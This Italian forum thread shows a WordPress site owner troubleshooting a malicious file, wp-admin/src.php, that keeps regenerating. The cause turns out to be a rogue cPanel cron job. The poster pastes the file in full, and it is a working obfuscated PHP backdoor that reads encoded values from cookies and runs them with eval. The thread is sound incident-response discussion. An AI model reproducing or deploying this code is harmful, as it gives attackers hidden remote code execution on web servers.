- Home
- Categorie
- Coding e Sistemistica
- CMS & Piattaforme Self-Hosted
- file anomalo in wp admin
-
@micropedia si in effetti lo utilizzo anch'io, wordfence mi riconosce il file come infetto wp-admin/src.php, e scansiona solamente questo file, a me interessa capire quale altro file genera in continuazione questo file. ti dico cosa c'è all'interno di questo file:
<?php
class Apt
{
private static $s;
public static function g($n)
{
if (!self::$s)
self::i();
return self::$s;
}
private static function i()
{
self::$s = array(
0135,
0135,
0116,
0111,
026,
0136,
0122,
012,
00
);
}
}
function click()
{
$_fkm = $_COOKIE;
($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
return Apt::g(8);
}
click();ho provato a lasciare vuoto anche il file, ma dopo un po si regenera tutto di nuovo.
-
credo che sia proprio questo il problema prova a cancellarlo (facendo prima una copia non si sa mai)
Non lo vedo nell'elenco dei file nativi di wordpress
1 Risposta
-
@micropedia si lo cancello e dopo qualche instante viene ricreato
-
una cosa che faccio io in questi casi è controllare le date di tutti i files vedi i files creati oggi o ieri saranno tutti contaminati o superflui
-
Lascia stare la caccia al tesoro.
Reinstalla wordpress manualmente da ftp e cancella tutto quello che non sono i tuoi file caricati nella cartella upload.
Dopo passa wordfence / sucuri giusto per sicurezza.
-
Risolto! in effetti il sito è stato ripulito correttamente e va tutto bene adesso, il problema del file (src.php) era dovuto ad un cron impostato in modo inspiegabile nel cpanel.
1 Risposta
-
@mastertest puoi spiegarci come hai individuato questo Cron?
-
@kejsirio andando per esclusione dopo 2 giorni di ricerca nelle cartelle wordpress, mi era rimasto solo il cpanel dove avevo già effettuato una scansione, poi ho trovato un cron molto sospetto, dopo averlo eliminato è ritornato tutto regolare e funziona il tutto perfettamente.
-
@homeworker si certo
